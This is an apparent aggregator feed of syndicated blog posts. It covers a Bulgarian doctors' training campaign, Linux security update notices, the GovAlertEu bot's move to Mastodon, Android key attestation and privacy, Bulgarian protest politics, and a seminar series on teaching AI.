Why should our young doctors also train abroad? A conversation with Dr. Neda Bakalova

Post Syndicated from Надежда Цекулова original https://www.toest.bg/zashto-mladite-ni-lekari-da-se-obuchavat-i-v-chujbina/

Neda Bakalova is a physician specializing in anesthesiology, resuscitation and intensive care. She studied and completed her specialty training in Bulgaria, but in recent years she has worked at the hospital in Southampton in the United Kingdom. That is why you will notice how often she says “here” in this interview. Her “here” is our “there”, a place where pediatric healthcare is better organized and delivers better results.

Dr. Neda Bakalova. Photo: personal archive

Neda is one of the initiators of the campaign “Лекари на бъдещето” (Doctors of the Future), organized by the BCause Foundation and the media platform “Майко Мила”. It is a program for raising the standard of pediatric care in Bulgaria, aimed at resident doctors in various pediatric specialties. Its goal is to help them gain professional experience at medical institutions abroad and bring it back home, in the name of the long-awaited qualitative change in Bulgarian pediatric healthcare.

The program’s goal for 2025 is to send five young doctors on clinical observerships at hospitals in Europe. The amount needed is approximately 50,000 leva.

You can donate:
via Платформата.бг
through benevity, if you are a registered employee of a company with a profile there
by sending an SMS to 17 777 with the text DMS LEKARI


You are a young doctor who has already settled abroad. Why do you care about the training of your colleagues who practice in Bulgaria?

Yes, I am an anesthesiologist by specialty. For three years I have worked in cardiac intensive care and cardiac surgery at the hospital in Southampton. Before that, in Bulgaria, I was mainly at the “Света Екатерина” hospital. After arriving here, I started working in pediatric cardiac surgery for the first time. The team supported me a great deal and continues to support and train me. I now give anesthesia to children in pediatric cardiac surgery, while in parallel I work in adult intensive care and observe the work of my colleagues in pediatric intensive care.

The “Лекари на бъдещето” program itself began with a personal story. Perhaps it is not my place to tell it, but in short, the child of the woman who initiated it, who sadly died last year, spent the last 5–6 months of life in the Pediatrics hospital [СБАЛ по детски болести „Проф. Иван Митев“ – ed.]. We spoke often, and I had to explain things that had not been explained to her. That is where the idea came from: it would be good for pediatrics residents to gain some experience outside Bulgaria and see that medicine can be practiced in a different way.

I was a resident in Bulgaria, and it is very hard.

And in fact the main idea of this program is to show young doctors that not everything comes down to how much money or how many resources the system has. A large part of it is organization and mindset.

We are not taught how to talk to patients, how to give them the psychological space to get through what they are experiencing. It would be useful for them to see how doctors here do that.

What is different apart from the amount of resources? It is a bit difficult, but could you try to explain what “a different way of thinking” means, for example?

It will not be easy, because this does not concern only doctors and their attitude toward patients; it goes both ways and is somehow broader. I also realize that I have changed here. The society is different, and relations between people are different. Unfortunately, we Bulgarians do not treat one another very well, and that carries over to every level: from medic to patient, from relatives to medics.

Besides, people in England are extremely proud of their public health system, because it is entirely funded and built by their taxes. And although it has plenty of flaws and plenty of waiting, the overall attitude toward healthcare workers is positive; there is trust, which makes the work much easier.

In Bulgaria, trust between patients and doctors is lacking. There are also not enough people in the system, and the workload is enormous. As a result, when you go to talk to relatives and patients, you are very likely to be on edge because you are exhausted, while they in turn are suspicious and do not believe you. How are you supposed to meet each other under those conditions?

Here, conversation and contact between doctors and patients are encouraged in every way. There is a relatives’ room where I can sit down and talk with people normally, in a private setting, for as long as needed. In Bulgaria you are most often standing in a corridor or in front of some half-open door, often with no way to shield the conversation from outsiders.

That is why I mentioned a “way of thinking”: it does not happen through my personal effort alone. The system simply sees and treats the doctor–patient relationship differently.

In Bulgaria, besides communication, the definition and control of the quality of medical care are also neglected. The United Kingdom has a tradition of creating professional standards in medicine. What can a young Bulgarian doctor learn about this at a hospital like the one in Southampton?

Everything here is considerably more transparent; statistics are kept on everything and audits are carried out. This transparency is needed in order to see the errors in the system and correct them. If you do not track what you are actually doing, keep no statistics or at least do not show them, and if nobody is ever held accountable, then quality is certainly worse. In Bulgaria, as a whole, we have no system for this. Here, for example, if you are a resident, every year you have to carry out a small audit of data at the hospital where you work, on a topic of your choosing. People here have a tradition of tracking the quality of their own work. I personally have not seen this done in Bulgaria.

Could you give an example for readers who do not work in medicine?

I work in cardiac surgery. If you go to the website of the society of cardiac surgeons [in the United Kingdom – ed.], you will find data, hospital by hospital, on what kinds of patients are operated on, what their mortality is, and what complications they have. Nothing like that exists in Bulgaria.

In addition, the professional societies here also develop clinical practice guidelines. In Bulgaria it would be practical to use the European ones, but those also need to be translated and adapted, which I do not think every specialty society does.

The end result of all this is that here it is hard to find someone who practices medicine very differently from someone else. In other words, there is a common level and a shared understanding of what is good practice and what is not.

How long will the doctors from the program spend at the hospital in Southampton, and to what extent will they be able to get to know the processes you describe?

They will spend between 4 and 6 weeks. The first specialists will see how things are done in the pediatric intensive care unit at the hospital in Southampton. Work there follows up-to-date protocols, and not only for the doctors but for the nurses as well. For example, when you hand over a patient, there is a checklist of what is to be done: specific steps to prevent human error. Human errors are part of being human and will always exist, but they can be kept to a minimum when things are standardized and there is some order.

Another experience I think will be useful for my colleagues is seeing the working relationships in the unit. My experience of relations between specialists and residents in Bulgaria is not especially positive. Here relationships are far more professional. There are no accusations and no raised voices. Overall this leads to safer practice, because if a mistake happens somewhere, or something worrying needs to be said, you are not afraid to say it.

From a purely medical point of view, the hospital has one interesting activity: as a regional hospital in southern England, it covers a fairly large area for the transport of critically ill children, in cooperation with the Oxford intensive care unit.

The organization of hospitals here is roughly like that in Bulgaria: there are large multi-specialty hospitals and small, municipal hospitals. If there is a child in a serious condition at a smaller center, this unit takes on the task of moving the child to the large center. That is actually very, very difficult work. And my colleagues will be able to see how it is done and how it is organized.

They will also be able to take part in courses on emergency life support* for children. And last but not least, they will see in practice how communication in intensive care works, both with parents and with children.

When do you expect the first residents from Bulgaria?

We expect one person to come in February, and two more to pass through this hospital later in the year. In the meantime, I am working on building links with other intensive care units as well. Our aim is for at least five people a year to be able to train.

Is there any way to build on this experience afterwards?

That depends to a large extent on the doctors who go through the training. In England there are constantly advertisements for training posts; here they are called fellowships. That is already a job. Quite a few foreigners come this way in order to train. Colleagues who have been through the initial stage as clinical observers, an observership, have an advantage when applying for positions in more advanced training. Besides, while they are here they can make contacts that will ease their later development. I have personally committed to helping colleagues get to know the steps and even prepare documents if needed.

You mentioned “pediatric intensive care” several times. Is this training open only to intensivists, or also to doctors training in other pediatric subspecialties?

For the moment we are trying to start with that. We are partnering with the Specialized Hospital for Children’s Diseases in Sofia, and we know for certain that its management is ready to support doctors working in its intensive care unit in joining the training. Beyond that there are certainly needs, and there are opportunities here, but we will need time to develop them.

Perhaps it is important to explain that when a young doctor is a clinical observer, they do not simply wander around the hospital and watch. These placements are taken very seriously here, and the team commits to training the young doctor, which is why it is not possible, for example, to have many colleagues with clinical observer status in intensive care at the same time. Separately, the hospital in Southampton often receives observers from other, smaller medical institutions in the region.

How will the “doctors of the future” be funded?

The BCause Foundation supported us in organizing the campaign, and we already have profiles on Платформата.бг and DMS. A fee of over 1,000 pounds has to be paid to the hospital. Separately, we would like to be able to cover the doctors’ travel and accommodation costs.

It is simply that in Bulgaria there are very few opportunities to see that it is good to do things systematically. Even if someone does something well, our system has many ill-conceived features and does not allow us to be consistent: one time we can provide good care, the next time we cannot. And it does not depend on us alone. That is why it is good to see the overall organization of a system that delivers better results.

* Emergency life support: the term is usually used for procedures or measures taken in critical situations to maintain a patient’s vital functions, for example resuscitation, artificial ventilation or cardiac massage.

Security updates for Thursday

Post Syndicated from jake original https://lwn.net/Articles/1001863/

Security updates have been issued by Debian (libsoup2.4, python-aiohttp, and upx-ucl), Fedora (iaito, python3.11, python3.9, and radare2), Red Hat (ruby, ruby:2.5, and ruby:3.1), Slackware (mozilla-thunderbird), SUSE (govulncheck-vulndb, nodejs18, nodejs20, and socat), and Ubuntu (ofono and python-tornado).

GovAlertEu accounts are now mainly on Mastodon and Bluesky

Post Syndicated from Боян Юруков original https://yurukov.net/blog/2024/govalerteu-mastodon-bluesky/

Light is the best disinfectant.

A little over ten years ago I realized that I found it hard to follow what was going on across Bulgarian institutions and that I could improve the process. So I built a system that reads news, documents, events and more several times a day and publishes them to a Twitter account. Over time the sources of information grew to 140 from over 31 different institutions, and the number of accounts grew to eight.

The project is called GovAlertEu, and until recently it published messages to unofficial accounts for several institutions, including those of the Ministry of Interior (МВР) and the Council of Ministers. The Ministry of Interior account became official twice, most recently under one of the regular cabinets. After that I took back control of it. The Council of Ministers account is still official and they have access to it, while the automation for publishing news remains in place.

Several things changed in the past year. First, the considerably larger amount of information I publish about urban planning in Sofia, Plovdiv and Blagoevgrad, along with the interest in the data and visualizations, put a strain on the resources I use. Second, changes in how Twitter/X operates as a network made it almost impossible to run automated accounts like mine without paying significant sums every month. Sums that would be justified only for large companies and astroturf bot networks, which seem to be the only ones left there.

As early as the first steps toward closing off API access to Twitter, I started looking at networks like Mastodon. In the past few days I finished the integration and it is now available for use. Thanks to @mapto for pointing me to suitable code to use.
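As a rough illustration of what posting an automated message to a Mastodon-compatible server can look like, here is a minimal sketch in Python. It is not the code behind GovAlertEu, which the post does not show; it assumes a bot that talks to a server’s REST API (`POST /api/v1/statuses` with a bearer token). The instance URL, the token and the `build_status_request` helper are hypothetical.

```python
import urllib.parse
import urllib.request


def build_status_request(instance: str, token: str, text: str,
                         dedupe_key: str) -> urllib.request.Request:
    """Build (but do not send) a request that would publish one status.

    `instance` and `token` are placeholders for a real server and a real
    application access token; nothing here is taken from GovAlertEu.
    """
    body = urllib.parse.urlencode(
        {"status": text, "visibility": "public"}
    ).encode("utf-8")
    return urllib.request.Request(
        url=f"{instance}/api/v1/statuses",
        data=body,
        method="POST",
        headers={
            "Authorization": f"Bearer {token}",
            # Lets the server ignore an accidental repeat of the same post.
            "Idempotency-Key": dedupe_key,
        },
    )


req = build_status_request(
    "https://mastodon.example",      # hypothetical instance
    "HYPOTHETICAL_TOKEN",            # hypothetical access token
    "New document published: https://example.org/doc/1",
    "doc-1",
)
# urllib.request.urlopen(req) would actually send it; omitted so the
# sketch runs offline.
```

Using a stable identifier of the source item as the idempotency key is one simple way to avoid double-posting when a poller re-reads the same page several times a day.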

The accounts available on the new portal

At m.govalert.eu you will find all the accounts connected to this network. All news coming from the institutions is published there in real time, without restrictions. The page is also a portal for the ActivityPub protocol, which means you can follow the accounts from any Fedi network you like, including Mastodon. I have connected the accounts through Fedi Bridge to Bluesky, where messages will appear with a delay of one to 15 minutes.

You will find links to the individual networks, including Twitter for now, as buttons on the page itself. On Twitter, from the start of the year, because of the restrictions I will publish only links to Mastodon, with daily statistics on how many messages followers there have missed. To begin with this will apply to the main GovAlertEu account, the Ministry of Interior one and the one for urban planning in Sofia. The government account does not have that much news, so it will be the last.

You will notice that old messages are missing. Over the next week I will generate the news going back at least 4-5 years. I want to develop this page as the main one for the service, together with statistics, an indication of which pages of the administration have been deleted, have disappeared or have changed, and archiving of some of them. In such cases the links from the social networks will point to the archived version.

You can also see that the parliament account has had no messages for some time. In fact, the sources of information are not 140 but 218, from 47 institutions, but a sizeable share of them have either changed their websites significantly or no longer publish the relevant information. Given the shift of focus toward urban planning I have not maintained these sources, but with this new portal I will: I will update them one by one, starting with the parliament’s page. This change opens up the possibility of significantly expanding the information I want to publish, since until now I had been imposing limits because of the communication with Twitter.

You will find my own Mastodon and Bluesky accounts in the links below my blog. I welcome any feedback and ideas.

The post GovAlertEu accounts are now mainly on Mastodon and Bluesky first appeared on Блогът на Юруков.

Android privacy improvements break key attestation

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/70630.html

Sometimes you want to restrict access to something to a specific set of devices – for instance, you might want your corporate VPN to only be reachable from devices owned by your company. You can’t really trust a device that self attests to its identity, for instance by reporting its MAC address or serial number, for a couple of reasons:

  • These aren’t fixed – MAC addresses are trivially reprogrammable, and serial numbers are typically stored in reprogrammable flash at their most protected
  • A malicious device could simply lie about them

If we want a high degree of confidence that the device we’re talking to really is the device it claims to be, we need something that’s much harder to spoof. For devices with a TPM this is the TPM itself. Every TPM has an Endorsement Key (EK) that’s associated with a certificate that chains back to the TPM manufacturer. By verifying that certificate path and having the TPM prove that it’s in possession of the private half of the EK, we know that we’re communicating with a genuine TPM[1].

Android has a broadly equivalent thing called ID Attestation. Android devices can generate a signed attestation that they have certain characteristics and identifiers, and this can be chained back to the manufacturer. Obviously providing signed proof of the device identifier is kind of problematic from a privacy perspective, so the short version[2] is that only apps installed using a corporate account rather than a normal user account are able to do this.

But that’s still not ideal – the device identifiers involved included the IMEI and serial number of the device, and those could potentially be used to correlate devices across privacy boundaries since they’re static[3] identifiers that are the same both inside a corporate work profile and in the normal user profile, and also remain static if you move between different employers and use the same phone[4]. So, since Android 12, ID Attestation includes an “Enterprise Specific ID” or ESID. The ESID is based on a hash of device-specific data plus the enterprise that the corporate work profile is associated with. If a device is enrolled with the same enterprise then this ID will remain static, if it’s enrolled with a different enterprise it’ll change, and it just doesn’t exist outside the work profile at all. The other device identifiers are no longer exposed.
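To make the ESID property concrete, here is a minimal Python sketch of an identifier derived from device-specific data plus an enterprise identifier. The real Android derivation is not described in this post, so the use of SHA-256, the length-prefixed encoding and the name `enterprise_specific_id` are all assumptions made purely for illustration.

```python
import hashlib


def enterprise_specific_id(device_data: bytes, enterprise_id: str) -> str:
    """Hypothetical ESID: a hash over device data plus the enterprise.

    This is NOT Android's actual algorithm, only an illustration of the
    property described above.
    """
    h = hashlib.sha256()
    # Length-prefix each field so that different (device, enterprise)
    # pairs can never produce the same byte stream.
    for field in (device_data, enterprise_id.encode("utf-8")):
        h.update(len(field).to_bytes(4, "big"))
        h.update(field)
    return h.hexdigest()


device = b"example-device-unique-data"   # placeholder device secret
first_enrolment = enterprise_specific_id(device, "employer-a")
re_enrolment = enterprise_specific_id(device, "employer-a")
new_employer = enterprise_specific_id(device, "employer-b")
```

With this construction, `first_enrolment` and `re_enrolment` are identical, while `new_employer` differs, so two employers cannot correlate the same phone by comparing IDs.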

But device ID verification isn’t enough to solve the underlying problem here. When we receive a device ID attestation we know that someone at the far end has possession of a device with that ID, but we don’t know that that device is where the packets are originating. If our VPN simply has an API that asks for an attestation from a trusted device before routing packets, we could pass that on to said trusted device and then simply forward the attestation to the VPN server[5]. We need some way to prove that the device trying to authenticate is actually that device.

The answer to this is key provenance attestation. If we can prove that an encryption key was generated on a trusted device, and that the private half of that key is stored in hardware and can’t be exported, then using that key to establish a connection proves that we’re actually communicating with a trusted device. TPMs are able to do this using the attestation keys generated in the Credential Activation process, giving us proof that a specific keypair was generated on a TPM that we’ve previously established is trusted.

Android again has an equivalent called Key Attestation. This doesn’t quite work the same way as the TPM process – rather than being tied back to the same unique cryptographic identity, Android key attestation chains back through a separate cryptographic certificate chain but contains a statement about the device identity – including the IMEI and serial number. By comparing those to the values in the device ID attestation we know that the key is associated with a trusted device and we can now establish trust in that key.

“But Matthew”, those of you who’ve been paying close attention may be saying, “Didn’t Android 12 remove the IMEI and serial number from the device ID attestation?” And, well, congratulations, you were apparently paying more attention than Google. The key attestation no longer contains enough information to tie back to the device ID attestation, making it impossible to prove that a hardware-backed key is associated with a specific device ID attestation and its enterprise enrollment.
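The breakage can be sketched as a field-matching problem. The Python below is an illustrative model only: the class and field names are hypothetical, and the exact contents of each attestation on a real device are an assumption. It treats the pre-Android 12 case as both attestations carrying IMEI and serial number, and the later case as a device ID attestation that carries only an ESID.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class DeviceIdAttestation:      # hypothetical, simplified model
    imei: Optional[str]
    serial: Optional[str]
    esid: Optional[str]


@dataclass(frozen=True)
class KeyAttestation:           # hypothetical, simplified model
    imei: Optional[str]
    serial: Optional[str]


def key_matches_device(key: KeyAttestation, dev: DeviceIdAttestation) -> bool:
    """True only if some identifier appears in both attestations and
    every identifier they share has the same value."""
    pairs = [(key.imei, dev.imei), (key.serial, dev.serial)]
    shared = [(k, d) for k, d in pairs if k is not None and d is not None]
    return bool(shared) and all(k == d for k, d in shared)


key = KeyAttestation(imei="356938035643809", serial="ABC123")
old_style = DeviceIdAttestation(imei="356938035643809", serial="ABC123", esid=None)
new_style = DeviceIdAttestation(imei=None, serial=None, esid="9f2c-example")

linked_before = key_matches_device(key, old_style)   # identifiers overlap
linked_after = key_matches_device(key, new_style)    # nothing in common
```

In this model the key can be tied to the old-style attestation but not to the ESID-only one, because the two documents no longer share any field to compare.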

I don’t think this was any sort of deliberate breakage, and it’s probably more an example of shipping the org chart – my understanding is that device ID attestation and key attestation are implemented by different parts of the Android organisation and the impact of the ESID change (something that appears to be a legitimate improvement in privacy!) on key attestation was probably just not realised. But it’s still a pain.

[1] Those of you paying attention may realise that what we’re doing here is proving the identity of the TPM, not the identity of the device it’s associated with. Typically the TPM identity won’t vary over the lifetime of the device, so having a one-time binding of those two identities (such as when a device is initially being provisioned) is sufficient. There’s actually a spec for distributing Platform Certificates that allows device manufacturers to bind these together during manufacturing, but I last worked on those a few years back and don’t know what the current state of the art there is.

[2] Android has a bewildering array of different profile mechanisms, some of which are apparently deprecated, and I can never remember how any of this works, so you’re not getting the long version

[3] Nominally, anyway. Cough.

[4] I wholeheartedly encourage people not to put work accounts on their personal phones, but I am a filthy hypocrite here

[5] Obviously if we have the ability to ask for attestation from a trusted device, we have access to a trusted device. Why not simply use the trusted device? The answer there may be that we’ve compromised one and want to do as little as possible on it in order to reduce the probability of triggering any sort of endpoint detection agent, or it may be because we want to run on a device with different security properties than those enforced on the trusted device.

Why are there no longer mass protests in Bulgaria?

Post Syndicated from Светла Енчева original https://www.toest.bg/zashto-v-bulgaria-veche-nyama-masovi-protesti/

If someone knows nothing about politics in Bulgaria and takes an evening stroll through the streets of central Sofia or the other big cities, they will conclude that all is well with us. The restaurants and bars are full, the squares are empty (at least of protesters), and the people are visibly content, as a song once put it.

Yet there are grounds for mass protests. Bulgaria is in a state of institutional semi-collapse. For three and a half years now there has been no regular government that has lasted even one year, let alone a full term. Most of the so-called regulators (including the Supreme Judicial Council) have expired mandates, and institutions such as the ombudsman are without leadership. Delyan Peevski has captured not only DPS (ДПС) but also the top of the justice system, as well as a number of municipalities around the country. At the same time, hybrid attacks from Russia, whose aim is to change Bulgaria’s geopolitical orientation, continue unabated.

And what protests there used to be…

After the collapse of the totalitarian regime at the end of 1989, mass protests took place in Bulgaria on several occasions. And that is without counting the crowded rallies from December 1989 to the early 1990s. Here are a few examples:

The Videnov winter

From 1995 to February 1997 a government of BSP (БСП) was in power, with Zhan Videnov as prime minister. During this period some fifteen banks went bankrupt, and inflation, especially from 1996 onward, spiraled out of control. People’s savings melted away.

A personal memory: in the summer of that year I was a university student. Because money was losing its value, I decided to close the children’s savings account my grandmother had opened long ago. The money, paid in methodically throughout my childhood, was enough to buy a wedding present: one deodorant and one razor.

At the end of 1996 and the beginning of 1997, inflation turned into hyperinflation. If I forgot to buy macaroni in the morning, by early evening it cost twice as much. Salaries fell to 5–6 US dollars. Not per day, but per month. At the very end of the year Videnov resigned, but his government continued to function.

In the midst of this situation protests began, joined by members of all kinds of groups, from students to pensioners. Despite the cold, the street marches continued throughout January and into early February.

Meanwhile, on 22 January, President Petar Stoyanov took office. By protocol he was obliged to hand the mandate to form a government to BSP again, who, despite the protests, were pressing to form a new cabinet. Instead of simply accepting the folder with the names of the new ministers, on 4 February Stoyanov convened the Consultative Council for National Security, at which he persuaded those who had submitted the proposal to withdraw it.

And so the protest won. A currency board was introduced, which remains in force to this day. Elections were held and won with a majority by the United Democratic Forces, and the cabinet of Ivan Kostov governed for four years.

#ДАНСwithme

In June 2013 the mass protests against the government of Plamen Oresharski began. What led up to them, however, was a different set of protests, which brought down Boyko Borisov’s first cabinet. These were the so-called protests against the monopolies, directed mainly against high electricity prices and the electricity distribution companies. The demonstrations in dozens of Bulgarian cities turned political. During this period Plamen Goranov, from Varna, took his own life by setting himself on fire in front of the Varna municipality building.

As a result, Borisov resigned. GERB (ГЕРБ) won again in the early elections, but Borisov declined to form a government. The mandate thus went to BSP, which formed a coalition cabinet with DPS, backed by the “golden finger” of Ataka.

One of the first things the newly elected prime minister Plamen Oresharski did was to propose, from the parliamentary rostrum, Delyan Peevski as head of the State Agency for National Security (DANS, ДАНС). Parliament accepted the proposal, and that same evening, 14 June, protests began that lasted more than a year, even though Peevski resigned the very next day. Members of GERB also took part in them.

Besides the marches of many thousands and the cases of police violence, the protests against Oresharski are also remembered for some art performances (for example, a re-enactment of Eugène Delacroix’s painting “Liberty Leading the People”). And for the hashtags #ДАНСwithme, a play on DANS (ДАНС) and the English word “dance”, and #КОЙ (“who”), because nobody would say who had originally proposed Peevski as head of DANS. Because of this hashtag, the word “кой” is still used as a synonym for Delyan Peevski.

Over time the protest marches thinned out, but they never disappeared. Plamen Oresharski resigned in August 2014.

The protests of 2020

In 2020 Borisov’s third government was in power. Although GERB took part in the 2013 protests, during the next two terms in which they were the leading political force they allowed DPS (including Peevski) to pull the strings of both the government and the justice system.

In June, compromising material related to Boyko Borisov was circulated: photos from his bedroom showing wads of cash, gold bars and a pistol, as well as a recording in which a voice resembling his makes threats. At the end of the month the Anti-Corruption Fund published the first part of the journalistic investigation “Осемте джуджета” (The Eight Dwarfs).

To illustrate the scale of behind-the-scenes power and to demonstrate the need for judicial reform, in July 2020 members of the party Yes, Bulgaria, led by its chairman Hristo Ivanov, landed by boat at the so-called saray, the seaside residence of DPS honorary chairman Ahmed Dogan at Rosenets. The action brought to light the fact that the beach around Dogan’s residence, although state property, is guarded by officers of the National Service for Protection and is in practice private.

The combination of these events gave impetus to protests, which also did not pass without police violence. Because of the COVID-19 pandemic they were not as large as in 2013. But, again because of it, many Bulgarian students studying abroad were able to join, having returned home when in-person teaching was temporarily suspended.

The head of state, Rumen Radev, also played an important role in the protests, especially after heavily armed representatives of the prosecution service demonstratively raided the Presidency. Alongside Democratic Bulgaria, the pro-Russian Vazrazhdane and representatives of the left also joined the protests. Borisov’s third government lasted until April 2021.

Who is with whom, and against whom?

From 2021 to the present there have been seven parliamentary elections (so far) and eight governments, six of them caretaker. Pity the future schoolchildren who will read about these times in their history textbooks!

At first the situation seemed clear: everyone against GERB and DPS. “Everyone” meant President Rumen Radev, Slavi Trifonov’s newly created pro-presidential party There Is Such a People (ITN), BSP, Democratic Bulgaria, and the coalition “Stand Up! Mafia Out!” (later “Stand Up BG! We Are Coming!”), led by Maya Manolova. This was despite the fact that in 2013 Manolova, then in BSP, had stated that she was the one who proposed Peevski as head of DANS (ДАНС). She later retracted her words.

ITN won the elections later that year, but its absurd cabinet proposals and the no less absurd behavior of its members suggested that Trifonov’s party did not actually want to govern. Meanwhile, in Stefan Yanev’s first caretaker government, Kiril Petkov and Asen Vasilev had risen to prominence. They founded their own political project, We Continue the Change (PP), and won the following elections. Petkov became prime minister of a coalition government of PP, Democratic Bulgaria (DB), BSP and ITN.

In this period Radev was at the height of his popularity and was elected to a second term, with PP’s support as well. Before long, however, the president turned against Petkov and Vasilev. The conflict between him and PP deepened after Russia’s war against Ukraine broke out, because PP sided with Ukraine, while Radev holds pro-Russian positions.

Petkov’s government fell in August 2022, after ITN turned against PP. Two caretaker (and pro-Russian) cabinets under Galab Donev followed. The National Assembly acquired three pro-Russian parties: Vazrazhdane, Bulgarian Rise of former caretaker prime minister Stefan Yanev, and BSP.

The main dividing line was thus no longer everyone against GERB and DPS, but Europe against Russia.

In this situation GERB began to look like “the good guys” again and, logically, won the next elections. And the ones after that. Then PP, by now in coalition with DB, found themselves compelled to take part in a joint government with GERB, declared to be rotational, so that Rumen Radev would stop pushing his own policies through caretaker cabinets. For the same reason parliament also passed amendments to the Constitution, an important part of which was limiting the president’s powers.

The joint rule of PP–DB and GERB, dubbed the “сглобка” (assemblage) by Lena Borislavova of PP, came at a high price: the legitimization of DPS, and of Delyan Peevski in particular. At first this happened supposedly because of the majority needed for the constitutional amendments. Soon, however, Peevski attached himself to the “сглобка” and behaved as if he were its official spokesman. And GERB and DPS blamed PP–DB for every problem. In the end they refused to have Mariya Gabriel become prime minister in place of Nikolay Denkov, as the rotation of the government required. And it fell.

Two caretaker governments under Dimitar Glavchev followed, through which, because of the president’s limited powers, GERB and DPS are in practice governing. That is, mostly DPS, which in the meantime split into a Peevski camp and a Dogan camp, while Peevski used his power over the justice system to take control of the party. This led to heavily manipulated elections and various forms of pressure to vote for Peevski.

Покрай всички тези събития Румен Радев отново изглежда „от добрите“. И започнаха да се множат проруски партии като „Величие“ (която за 21 гласа не влезе в последния парламент) и МЕЧ на бившия депутат от ИТН Радостин Василев.

Meaning, replaced by parallel realities

To sum up. Within a few years, almost every political actor in Bulgaria has been in various configurations both with the others and against them. This undermines trust not only in the existing parties and coalitions, but also in the functioning of parliamentary democracy.

Accordingly, mass protests seem to be losing their point. What is there to protest for, and what would the political representation of a protest look like? If the protest is against corruption and for judicial reform, it is very easy for the civic energy to be appropriated by pro-Russian forces, as has already happened. If the protest is in the name of Bulgaria's European orientation, it may look like a legitimisation of the “biggest Euro-Atlanticists”, GERB and DPS.

Meanwhile people are constantly bombarded with messages that divert public attention from the important problems. Whether it is kompromat wars, whether the police, courts and prosecution are used as clubs against the “disobedient” (one of the latest such cases was the request to lift Kiril Petkov's immunity), or whether it is populist legislative changes such as the ban on LGBTI “propaganda” in schools, there will always be something.

On top of everything, although there is nothing democratic in his actions, Delyan Peevski behaves like a spokesman for the democratic community in Bulgaria. Explaining, for example, that “a sick democracy is cured only with more democracy”, and that “the most powerful cure for democracy” is elections. It is debatable whether such statements can legitimise Peevski as a democrat. More likely they legitimise parliamentary democracy, in voters' eyes, as something “Peevski-like”.

What is looming on the horizon

While parliamentary democracy spins its wheels, life somehow goes on. True, yet again a state budget is being debated without anyone taking clear political responsibility for it. There is a risk that Bulgaria will lose a lot of money from the Recovery and Resilience Plan. But then incomes are rising, the country even entered Schengen, and it has a chance of eventually making it into the eurozone too. It is logical for many people to think: so things can work without parliamentary democracy as well.

In a little over a year Rumen Radev's second term expires, and he is the public figure with the highest approval rating in Bulgaria. If he creates his own political project, it is very likely to be a winning one. Especially if the project presents itself as an alternative to the current non-functioning political system. From there it is only one step to establishing some form of Putin-style authoritarian rule.

Recently Romania's Constitutional Court annulled the presidential election because of evidence of Russian interference in it. It turns out, incidentally, that the hybrid attacks in Romania are linked to companies registered in Bulgaria. And that these companies spread propaganda here too. Unlike the Romanian institutions, however, the Bulgarian ones do not seem to notice any problem.

Likewise, the security services, the prosecution and the other responsible institutions do not seem to show any interest in the Bulgarians in Great Britain exposed as Russian agents. Not even after the information that they had planned to kill the journalist Christo Grozev, who had revealed who was behind the attempted murder of Russian opposition figure Alexei Navalny.

The state also turned a deaf ear after a journalistic investigation by Svobodna Evropa revealed that Russia has an illegal consulate in the BSP office in Varna.

Not only the state: society does not seem to care either

Speaking of BSP, after nearly a month of deadlock, the constitutional law scholar Nataliya Kiselova, an MP from the civic quota of the party's list, was elected speaker of the current 51st National Assembly. She was on a specialisation in Moscow in the year Russia annexed Crimea. Before the elections BSP had billboards with the message “Russia is our friend”, even though Russia itself has declared Bulgaria an unfriendly state.

Kiselova's election took place with the support of PP–DB. After some drama the coalition voted this way in order to isolate the pro-Russian Vazrazhdane. Nobody from PP–DB, however, asked Kiselova what, in her view, the cause of the war in Ukraine is. Or whose Crimea is. As speaker of the National Assembly she is one of the people Rumen Radev could choose as caretaker prime minister if a regular cabinet once again fails to materialise.

Unlike the Bulgarians, the Georgians are protesting. The cause of their anger is the decision of the pro-Russian party that won the elections to postpone EU accession talks until 2028. The protesters also believe the elections were manipulated and dispute the results. This situation came about after systematic attempts by Russia to pull Georgia into its sphere of influence.

Unlike Georgia, Bulgaria is already in the EU. Yet the likelihood that an undemocratic pro-Russian regime will be established in the country, along the lines of Viktor Orbán's in Hungary, is by no means negligible. A worrying number of signs point to such a scenario. If it comes about, it may by then be too late to protest.

How can we teach students about AI and data science? Join our 2025 seminar series to learn more about the topic

Post Syndicated from Jane Waite original https://www.raspberrypi.org/blog/how-can-we-teach-students-about-ai-and-data-science-2025-seminar-series/

AI, machine learning (ML), and data science infuse our daily lives, from the recommendation functionality on music apps to technologies that influence our healthcare, transport, education, defence, and more.

What jobs will be affected by AI, ML, and data science remains to be seen, but it is increasingly clear that students will need to learn something about these topics. There will be new concepts to be taught, new instructional approaches and assessment techniques to be used, new learning activities to be delivered, and we must not neglect the professional development required to help educators master all of this.

As AI and data science are incorporated into school curricula and teaching and learning materials worldwide, we ask: What’s the research basis for these curricula, pedagogy, and resource choices?

In 2024, we showcased researchers who are investigating how AI can be leveraged to support the teaching and learning of programming. But in 2025, we look at what should be taught about AI, ML, and data science in schools and how we should teach this. 

Our 2025 seminar speakers — so far!

We are very excited that we have already secured several key researchers in the field. 

On 21 January, Shuchi Grover will kick off the seminar series by giving an important overview of AI in the K–12 landscape, including developing both AI literacy and AI ethics. Shuchi will provide concrete examples and recently developed frameworks to give educators practical insights on the topic.

Our second session will focus on a teacher professional development (PD) programme to support the introduction of AI in Upper Bavarian schools. Franz Jetzinger from the Technical University of Munich will summarise the PD programme and share how teachers implemented the topic in their classroom, including the difficulties they encountered.

Again from Germany, Lukas Höper from Paderborn University, with Carsten Schulte, will describe important research on data awareness and introduce a framework that is likely to be key for learning about data-driven technology. The pair will talk about the Data Awareness Framework and how it has been used to help learners explore, evaluate, and be empowered in looking at the role of data in everyday applications.

Our April seminar will see David Weintrop from the University of Maryland introduce, with his colleagues, a data science curriculum called API Can Code, aimed at high-school students. The group will highlight the strategies needed for integrating data science learning within students’ lived experiences and fostering authentic engagement.

Later in the year, Jesús Moreno-Leon from the University of Seville will help us consider the thorny but essential question of how we measure AI literacy. Jesús will present an assessment instrument that has been successfully implemented in several research studies involving thousands of primary and secondary education students across Spain, discussing both its strengths and limitations.

What to expect from the seminars

Our seminars are designed to be accessible to anyone interested in the latest research about AI education — whether you’re a teacher, educator, researcher, or simply curious. Each session begins with a presentation from our guest speaker about their latest research findings. We then move into small groups for a short discussion and exchange of ideas before coming back together for a Q&A session with the presenter. 

